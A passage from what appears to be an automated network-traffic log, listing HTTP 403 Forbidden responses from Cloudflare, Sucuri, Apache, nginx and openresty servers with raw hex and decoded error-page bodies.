70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 22 Mar 2023 04:45:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UcgwYDxy48%2FAhgnlRLUlACKe8UN%2F5p9Hw0g6nnGnmZh1PCMpjqgYu0r0IXtQu7gpQ3g8IJt7gdHICUL8d7vhJQ1AhIYqMJxGbajQWUmzeVHobGiPu6nYfE0gA5KjBw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc91efa933830-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 64 35 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 Data Ascii: 1d59<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-e
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:31 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ujgapTaGPQ%2FbuFuFPaW5tA3efGEoMHXzts3HHqOSJnjEWB6es%2FWVSbO3klFibgKBOx0K8bNLgbntj4LvIpaM%2F2FPjx%2BbKt%2FMjqyGfUDyeS3vNzUUCB%2B7GasD8t8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc91f083b3661-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:31 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=T0VzJOkjtk%2FHRyra%2BI%2BLPtLmjF%2FqhIChFGNHj70%2BSPwnfgL16nC4vUybbKDAT9h7xxlf1GBSkuoyYcJmIVj4tFb0szl4jPQZ5MahJAHEAjhvBLZt4ZSYRmBJxjF9Lj4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc9203d1635ee-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:31 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:31 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f3Xfn15wEhTyhXOi0Y5wk2WeI%2BFGMn97Dhlur9d4GiXMxYg02D7ntNPStt%2BwHKKIS223cPpmcgKXPW%2Fbo2S5CBfIDzSiA00MhR95o4SLisU4e%2FGmPLINETP22XjGzfs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc9207d3b35ee-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:31 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:31 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:32 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:45:32 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:33 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 22 Mar 2023 04:45:33 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:34 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5Ry1QmxFkmVT1Ulz63oLSaZmxUndNmrOVQhnLtR8VJFG62AOZBt3ysDc1Cke%2FA6j2CkLTzgjZ4LKX2%2FBdWvYUpRwZWh%2Bry5ZLccQk0a7XQD95qlzi9L%2FIoap5H9CIEk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc9354beb3830-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:34 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FhUJ7lReSbGfsWSrCXQ2DF4uRdH8eaWjujR2lmtVFbY6V%2Bvi%2Fpf%2F5P8MGGbQPsiuGQNNnwlyT4BHpuH5BxvO9jQ9VP34ohTttfx7skJIoEkbI87MsY14QYGPcOS%2Bkqw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc9357c153830-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:34 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vQH%2F6atiKKPwcFjtnTgxvtGpctIefyvjrxDvWJmrWA4uVTR93qI2UZRETgODKeK0AucT4Kge8cODEPVkgvNgE2TQfCGnPhV%2BjzlCjSKRKO%2BOfd3g3hPo8uLtTzI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc9359dbf3736-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:34 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QM6hFSEotRVPpE%2FuqRWw9LjOJ6Nl9uuuTTLULw5gvJHLojplTYvFd60yyR6NCHTsPorv4FW0sOv6U%2Bmo1uhE%2F3vMZJZAaU3XvYh%2FMOERCJUCLMmYEIvLLa90mD4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc935afdc39da-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 22 Mar 2023 04:45:34 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 